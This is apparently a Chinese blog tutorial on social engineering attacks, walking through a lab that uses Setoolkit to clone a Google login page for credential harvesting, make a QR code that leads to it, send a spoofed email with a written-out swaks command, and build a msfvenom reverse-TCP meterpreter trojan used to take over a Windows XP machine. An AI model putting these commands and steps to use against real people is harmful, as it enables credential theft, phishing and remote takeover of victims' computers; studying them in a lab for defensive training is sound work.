目录

  1. 1. 前言
  2. 2. Setoolkit
    1. 2.1. 步骤
      1. 2.1.1. 制作钓鱼网站
      2. 2.1.2. 二维码钓鱼
  3. 3. 钓鱼邮件
    1. 3.1. 步骤
  4. 4. 远控木马
    1. 4.1. 步骤

LOADING

第一次加载文章图片可能会花费较长时间

要不挂个梯子试试?(x

加载过慢请开启缓存 浏览器默认开启

社会工程学

2024/12/12
  |     |   总文章阅读量:

前言

我超,盒!爱丽丝错了爱丽丝不该在网上口嗨的


Setoolkit

Setoolkit 是一个为社会工程设计的开源渗透测试框架。SET 具有许多自定义攻击向量,可让我们快速进行可信的攻击。

root 启动 setoolkit

image-20241212143724005

默认会有如下选项:

  • Social-Engineering Attacks ##社会工程学攻击
  • Penetration Testing (Fast-Track) ##快速追踪测试
  • Third Party Modules ##第三方模块
  • Update the Social-Engineer Toolkit ##升级软件
  • Update SET configuration ##升级配置
  • Help, Credits, and About ##帮助

步骤

制作钓鱼网站

选择 1

image-20241212143953923

  1. 鱼叉式网络钓鱼

  2. 网页攻击 钓鱼

  3. 感染性性攻击,就是木马

  4. 建立 payloaad 和 listener

  5. 邮件群发攻击

  6. Arduino 基础攻击

  7. 无线接入点攻击

  8. 二维码攻击

  9. Powershell 攻击

  10. 第三反模块

这里选择 2

image-20241212144123364

  • Java Applet Attack Method ## java 程序攻击
  • Metasploit Browser Exploit Method ##Metasploit 浏览器漏洞攻击
  • Credential Harvester Attack Method ##钓鱼网站攻击
  • Tabnabbing Attack Method
  • Web Jacking Attack Method ## 网站 jacking 攻击
  • Multi-Attack Web Method ## 多种网站攻击方式
  • HTA Attack Method
  • Return to Main Menu

选择 3

image-20241212144459114

  • Web Templates ## web
  • Site Cloner ## 网站克隆设置
  • Custom Import ## 自定义导入
  • Return to Webattack Menu

选择 1

image-20241212144743612

指定 ip,然后选择要伪造的页面,这里选择伪造 google 的页面

image-20241212145009413

image-20241212144944674

成功启动,尝试输入账密,点击登录,会重定向到 Google 搜索引擎

image-20241212145127768

于是恶意服务端会收到账密


二维码钓鱼

SET 工具包中可以使用 QR Code Attack 模块发起二维码攻击,使被欺骗用户扫描你的二维码进入一个伪装钓鱼网站

选择模块 8

image-20241212145720164

输入要跳转的钓鱼网站的地址:192.168.253.128,生成二维码

image-20241212150217152

image-20241212150514405

解析一下二维码,就是我们刚才钓鱼网站的 ip,如果直接扫码就会跳转到钓鱼网站

image-20241212150714846


钓鱼邮件

当攻击者制作了钓鱼网站、木马程序后,便会想法设法将其传给受害者,而常见的传播方式便是钓鱼网站。安全意识较差的用户在收到钓鱼邮件后点击邮件中的钓鱼链接、下载附件中的木马程序,便可能遭受攻击

Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在 SMTP 邮件协议领域有非常非常广泛的应用,它通常被用来伪造邮件,进行钓鱼、社工等操作

image-20241212151311380

步骤

先申请一个临时邮箱用于收件,本次使用的临时邮箱网站是:http://24mail.chacuo.net/?continueFlag=e50436a75b1a77d2a32a07038cb58972

伪 造 一 份 来 自 l0w1ro 的 邮 件 , 收 件 人 为 designant51736@027168.com , 内 容 为 : "Congratulations on obtaining 20000 Memories! Please click on the following link to get the redemption code: http://example.com/"

sudo swaks --to designant51736@027168.com --from l0w1ro@616.sb --ehlo 616.sb --body "Congratulations on obtaining 20000 Memories! Please click on the following link to get the redemption code: http://example.com/"

image-20241212153153141

image-20241212153230252


远控木马

SET 同时集成了木马生成工具,可以生成木马并调用 MSF 框架对远程主机进行控制

步骤

选择模块 4

image-20241212154514509

选择攻击模式,然后设置监听的主机 IP(kali 攻击机的 IP 地址)和端口,即可在本地生成木马程序

image-20241212154908488

使用 python 在 /root/.set/ 下起 http 服务传输 payload.exe(如果发现 payload.exe 大小为 0 则说明生成失败,使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.253.128 LPORT=8000 -a x86 --platform Windows -f exe > payload.exe来观察报错)

image-20241212164132551

image-20241212164310470

运行木马

image-20241212164329371

image-20241212164437913

检测到了 winxp 的 ip 地址

在窗口中回车激活 Meterpreter 会话,sessions -i 1 获取 shell控制权限

sysinfo 查看系统信息,screenshot 进行屏幕截图

image-20241212164640654

image-20241212164905169